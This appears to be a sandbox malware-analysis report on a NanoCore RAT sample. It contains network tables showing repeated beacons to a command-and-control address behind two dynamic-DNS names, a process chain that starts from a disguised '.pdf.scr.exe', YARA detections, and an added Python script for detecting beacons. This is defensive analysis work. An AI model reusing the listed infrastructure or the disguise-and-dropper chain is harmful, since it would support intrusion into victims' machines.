              Feb 3, 2023 17:52:55.728024006 CET | 60705 | 49726 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:52:56.421844959 CET | 49726 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:52:56.953017950 CET | 60705 | 49726 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:02.842880964 CET | 49727 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:03.413187027 CET | 60705 | 49727 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:04.016222954 CET | 49727 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:04.482964993 CET | 60705 | 49727 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:05.125746012 CET | 49727 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:05.448577881 CET | 60705 | 49727 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:09.617194891 CET | 49728 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:10.073801041 CET | 60705 | 49728 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:10.642218113 CET | 49728 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:11.048384905 CET | 60705 | 49728 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:11.735630035 CET | 49728 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:12.313384056 CET | 60705 | 49728 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:16.493644953 CET | 49730 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:16.968214989 CET | 60705 | 49730 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:17.517337084 CET | 49730 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:18.348334074 CET | 60705 | 49730 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:18.874224901 CET | 49730 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:19.189841986 CET | 60705 | 49730 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:23.937660933 CET | 49731 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:24.764730930 CET | 60705 | 49731 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:25.361829042 CET | 49731 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:25.743491888 CET | 60705 | 49731 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:26.346234083 CET | 49731 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:26.543648958 CET | 60705 | 49731 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:30.786456108 CET | 49732 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:31.345398903 CET | 60705 | 49732 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:31.846702099 CET | 49732 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:32.373364925 CET | 60705 | 49732 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:32.878211975 CET | 49732 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:33.493311882 CET | 60705 | 49732 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:40.529577017 CET | 49734 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:40.953541994 CET | 60705 | 49734 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:41.644464970 CET | 49734 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:42.034797907 CET | 60705 | 49734 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:42.535142899 CET | 49734 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:43.121236086 CET | 60705 | 49734 | 212.193.30.230 | 192.168.2.7
              Feb 3, 2023 17:53:47.350707054 CET | 49735 | 60705 | 192.168.2.7 | 212.193.30.230
              Feb 3, 2023 17:53:47.818212032 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:48.332509041 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:48.823368073 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:49.332571030 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:49.707901955 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:53.955672979 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:54.679156065 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:55.192996025 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:55.649688959 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:56.162882090 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:56.823153973 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:01.482918978 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:01.823270082 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:02.524898052 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:02.957899094 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:03.462488890 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:04.038110971 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:08.468101025 CET4973860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:08.993590117 CET6070549738212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:09.509828091 CET4973860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:09.914083004 CET6070549738212.193.30.230192.168.2.7
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Feb 3, 2023 17:52:09.443150997 CET  50835        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:52:09.550913095 CET  53           50835      8.8.8.8         192.168.2.7
Feb 3, 2023 17:52:16.610014915 CET  63926        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:52:16.726582050 CET  53           63926      8.8.8.8         192.168.2.7
Feb 3, 2023 17:52:25.314857960 CET  51007        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:52:25.424727917 CET  53           51007      8.8.8.8         192.168.2.7
Feb 3, 2023 17:52:32.281383038 CET  60765        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:52:32.303405046 CET  53           60765      8.8.8.8         192.168.2.7
Feb 3, 2023 17:52:39.102504015 CET  50024        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:52:39.124073029 CET  53           50024      8.8.8.8         192.168.2.7
Feb 3, 2023 17:52:46.786912918 CET  49516        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:52:46.806299925 CET  53           49516      8.8.8.8         192.168.2.7
Feb 3, 2023 17:52:53.769855976 CET  61392        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:52:53.789580107 CET  53           61392      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:02.823585987 CET  52104        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:02.841408968 CET  53           52104      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:09.590004921 CET  65356        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:09.609643936 CET  53           65356      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:16.469430923 CET  51526        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:16.487303972 CET  53           51526      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:23.915457010 CET  51139        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:23.933341980 CET  53           51139      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:30.759666920 CET  58784        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:30.779515982 CET  53           58784      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:40.419250965 CET  64608        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:40.527806997 CET  53           64608      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:47.239336967 CET  58746        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:47.348970890 CET  53           58746      8.8.8.8         192.168.2.7
Feb 3, 2023 17:53:53.936758995 CET  62433        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:53:53.954144955 CET  53           62433      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:01.462042093 CET  61248        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:01.481538057 CET  53           61248      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:08.436933994 CET  52750        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:08.458302975 CET  53           52750      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:15.322606087 CET  50231        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:15.342376947 CET  53           50231      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:22.567852020 CET  58514        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:22.587543011 CET  53           58514      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:29.466197014 CET  51436        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:29.579541922 CET  53           51436      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:36.820679903 CET  59053        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:36.838251114 CET  53           59053      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:44.068591118 CET  51945        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:44.086455107 CET  53           51945      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:50.906075954 CET  63187        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:50.928325891 CET  53           63187      8.8.8.8         192.168.2.7
Feb 3, 2023 17:54:57.821435928 CET  64760        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:54:57.844635010 CET  53           64760      8.8.8.8         192.168.2.7
Feb 3, 2023 17:55:05.101567984 CET  53637        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:55:05.210943937 CET  53           53637      8.8.8.8         192.168.2.7
Feb 3, 2023 17:55:13.758878946 CET  58343        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:55:13.865463018 CET  53           58343      8.8.8.8         192.168.2.7
Feb 3, 2023 17:55:20.557543993 CET  62018        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:55:20.577339888 CET  53           62018      8.8.8.8         192.168.2.7
Feb 3, 2023 17:55:27.259848118 CET  50155        53         192.168.2.7     8.8.8.8
Feb 3, 2023 17:55:27.279320955 CET  53           50155      8.8.8.8         192.168.2.7
Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                    Type            Class        DNS over HTTPS
Feb 3, 2023 17:52:09.443150997 CET  192.168.2.7  8.8.8.8  0xebe5    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:16.610014915 CET  192.168.2.7  8.8.8.8  0x5828    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:25.314857960 CET  192.168.2.7  8.8.8.8  0x3e16    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:32.281383038 CET  192.168.2.7  8.8.8.8  0x5585    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:39.102504015 CET  192.168.2.7  8.8.8.8  0x1074    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:46.786912918 CET  192.168.2.7  8.8.8.8  0xc899    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:53.769855976 CET  192.168.2.7  8.8.8.8  0x1b1f    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:02.823585987 CET  192.168.2.7  8.8.8.8  0x4c8e    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:09.590004921 CET  192.168.2.7  8.8.8.8  0x2d8c    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:16.469430923 CET  192.168.2.7  8.8.8.8  0x8848    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:23.915457010 CET  192.168.2.7  8.8.8.8  0x297b    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:30.759666920 CET  192.168.2.7  8.8.8.8  0xc6ec    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:40.419250965 CET  192.168.2.7  8.8.8.8  0xda46    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:47.239336967 CET  192.168.2.7  8.8.8.8  0xa48     Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:53.936758995 CET  192.168.2.7  8.8.8.8  0x13d7    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:01.462042093 CET  192.168.2.7  8.8.8.8  0xfc42    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:08.436933994 CET  192.168.2.7  8.8.8.8  0x3b17    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:15.322606087 CET  192.168.2.7  8.8.8.8  0x4790    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:22.567852020 CET  192.168.2.7  8.8.8.8  0x2a56    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:29.466197014 CET  192.168.2.7  8.8.8.8  0xb3ae    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:36.820679903 CET  192.168.2.7  8.8.8.8  0x62ad    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:44.068591118 CET  192.168.2.7  8.8.8.8  0x2ae6    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:50.906075954 CET  192.168.2.7  8.8.8.8  0x9387    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:57.821435928 CET  192.168.2.7  8.8.8.8  0xfa40    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:05.101567984 CET  192.168.2.7  8.8.8.8  0x1982    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:13.758878946 CET  192.168.2.7  8.8.8.8  0xb7d7    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:20.557543993 CET  192.168.2.7  8.8.8.8  0x53ec    Standard query (0)  december2n.duckdns.org  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:27.259848118 CET  192.168.2.7  8.8.8.8  0x4cb8    Standard query (0)  december2nd.ddns.net    A (IP address)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                    CName  Address         Type            Class        DNS over HTTPS
Feb 3, 2023 17:52:09.550913095 CET  8.8.8.8    192.168.2.7  0xebe5    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:16.726582050 CET  8.8.8.8    192.168.2.7  0x5828    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:25.424727917 CET  8.8.8.8    192.168.2.7  0x3e16    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:32.303405046 CET  8.8.8.8    192.168.2.7  0x5585    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:39.124073029 CET  8.8.8.8    192.168.2.7  0x1074    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:46.806299925 CET  8.8.8.8    192.168.2.7  0xc899    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:52:53.789580107 CET  8.8.8.8    192.168.2.7  0x1b1f    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:02.841408968 CET  8.8.8.8    192.168.2.7  0x4c8e    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:09.609643936 CET  8.8.8.8    192.168.2.7  0x2d8c    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:16.487303972 CET  8.8.8.8    192.168.2.7  0x8848    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:23.933341980 CET  8.8.8.8    192.168.2.7  0x297b    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:30.779515982 CET  8.8.8.8    192.168.2.7  0xc6ec    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:40.527806997 CET  8.8.8.8    192.168.2.7  0xda46    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:47.348970890 CET  8.8.8.8    192.168.2.7  0xa48     No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:53:53.954144955 CET  8.8.8.8    192.168.2.7  0x13d7    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:01.481538057 CET  8.8.8.8    192.168.2.7  0xfc42    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:08.458302975 CET  8.8.8.8    192.168.2.7  0x3b17    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:15.342376947 CET  8.8.8.8    192.168.2.7  0x4790    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:22.587543011 CET  8.8.8.8    192.168.2.7  0x2a56    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:29.579541922 CET  8.8.8.8    192.168.2.7  0xb3ae    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:36.838251114 CET  8.8.8.8    192.168.2.7  0x62ad    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:44.086455107 CET  8.8.8.8    192.168.2.7  0x2ae6    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:50.928325891 CET  8.8.8.8    192.168.2.7  0x9387    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:54:57.844635010 CET  8.8.8.8    192.168.2.7  0xfa40    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:05.210943937 CET  8.8.8.8    192.168.2.7  0x1982    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:13.865463018 CET  8.8.8.8    192.168.2.7  0xb7d7    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:20.577339888 CET  8.8.8.8    192.168.2.7  0x53ec    No error (0)  december2n.duckdns.org  -      212.193.30.230  A (IP address)  IN (0x0001)  false
Feb 3, 2023 17:55:27.279320955 CET  8.8.8.8    192.168.2.7  0x4cb8    No error (0)  december2nd.ddns.net    -      212.193.30.230  A (IP address)  IN (0x0001)  false
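
The three tables above record one loop from three angles: about every seven seconds the sample resolves one of two dynamic-DNS names (three tries on december2n.duckdns.org, then three on december2nd.ddns.net), both answer 212.193.30.230, and a fresh TCP connection (new source port) goes to port 60705 on that host. The Python below is an added example and not part of the Joe Sandbox report: it parses a constructed subset of these rows (two or more spaces between columns), groups client-initiated connections by destination, measures the reconnect interval and its jitter, and tags destinations whose names fall in an assumed list of free dynamic-DNS zones. The function names, thresholds and zone list are illustrative choices, not anything Joe Sandbox or NanoCore defines.

```python
"""Beacon and dynamic-DNS triage over sandbox network rows.

Added example, not part of the Joe Sandbox report.  TCP_ROWS and DNS_ROWS
are a constructed subset of the report's entries, two or more spaces
between columns; zone list, thresholds and names are illustrative.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed: first client->server packet of eleven connections plus one
# server reply, in the report's column order (ts, sport, dport, sip, dip).
TCP_ROWS = """\
Feb 3, 2023 17:52:53.803543091 CET  49726  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:52:54.358467102 CET  60705  49726  212.193.30.230  192.168.2.7
Feb 3, 2023 17:53:02.842880964 CET  49727  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:53:09.617194891 CET  49728  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:53:16.493644953 CET  49730  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:53:23.937660933 CET  49731  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:53:30.786456108 CET  49732  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:53:40.529577017 CET  49734  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:53:47.350707054 CET  49735  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:53:53.955672979 CET  49736  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:54:01.482918978 CET  49737  60705  192.168.2.7  212.193.30.230
Feb 3, 2023 17:54:08.468101025 CET  49738  60705  192.168.2.7  212.193.30.230
"""

# Constructed DNS answers: ts, sip, dip, txid, rcode, name, address, type.
DNS_ROWS = """\
Feb 3, 2023 17:52:09.550913095 CET  8.8.8.8  192.168.2.7  0xebe5  No error (0)  december2n.duckdns.org  212.193.30.230  A
Feb 3, 2023 17:52:32.303405046 CET  8.8.8.8  192.168.2.7  0x5585  No error (0)  december2nd.ddns.net  212.193.30.230  A
"""

# Assumed free dynamic-DNS zones; extend from your own intel.
DYNAMIC_DNS_ZONES = ("duckdns.org", "ddns.net", "no-ip.com", "hopto.org")
_ROW = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) CET\s{2,}(.*)$")


def rows(text):
    """Yield (epoch_seconds, [columns]) per row; the fraction keeps all 9 digits."""
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue
        base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
        secs = (base - datetime(1970, 1, 1)).total_seconds() + float("0." + m.group(2))
        yield secs, re.split(r"\s{2,}", m.group(3))


def connection_starts(tcp_text, client_ip):
    """Sorted first-seen times of client-initiated connections per (dst_ip, dst_port)."""
    first = {}
    for ts, (sport, dport, sip, dip) in rows(tcp_text):
        if sip == client_ip:  # server->client packets never open a connection
            key = (dip, int(dport), int(sport))
            first[key] = min(ts, first.get(key, ts))
    starts = defaultdict(list)
    for (dip, dport, _sport), ts in first.items():
        starts[(dip, dport)].append(ts)
    return {k: sorted(v) for k, v in starts.items()}


def resolved_names(dns_text):
    """Map answered address -> set of names that resolved to it."""
    names = defaultdict(set)
    for _ts, cols in rows(dns_text):
        *_, rcode, name, address, _rtype = cols
        if rcode.startswith("No error"):
            names[address].add(name)
    return names


def is_dynamic_dns(name):
    return any(name == z or name.endswith("." + z) for z in DYNAMIC_DNS_ZONES)


def find_beacons(tcp_text, dns_text, client_ip="192.168.2.7",
                 min_connections=5, max_jitter=0.35):
    """Flag destinations reconnected at a near-constant interval.

    jitter = median absolute deviation of the gaps / median gap; a RAT
    reconnect loop keeps it low even with a few seconds of sleep.
    """
    names = resolved_names(dns_text)
    hits = []
    for (dip, dport), times in connection_starts(tcp_text, client_ip).items():
        if len(times) < min_connections:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        med = median(gaps)
        jitter = median(abs(g - med) for g in gaps) / med
        if jitter <= max_jitter:
            hits.append({"dst": f"{dip}:{dport}", "connections": len(times),
                         "median_interval_s": round(med, 1), "jitter": round(jitter, 2),
                         "names": sorted(names.get(dip, ())),
                         "dynamic_dns": any(is_dynamic_dns(n) for n in names.get(dip, ()))})
    return hits
```

On the constructed rows `find_beacons(TCP_ROWS, DNS_ROWS)` returns a single hit for 212.193.30.230:60705 with 11 connections, a median gap of about 6.9 s and both dynamic-DNS names attached, which is the condition to carry into NetFlow or Zeek conn and dns logs for hunting. The jitter threshold and minimum connection count are the knobs to tune against the sleep randomisation a given family actually shows.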


              Target ID:0
              Start time:17:51:27
              Start date:03/02/2023
              Path:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Imagebase:0x3d0000
              File size:1181640 bytes
              MD5 hash:3AC05BBE35293FBFD0DF49ECFB34C461
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:17:51:39
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
              Imagebase:0xd10000
              File size:147456 bytes
              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:6
              Start time:17:51:49
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
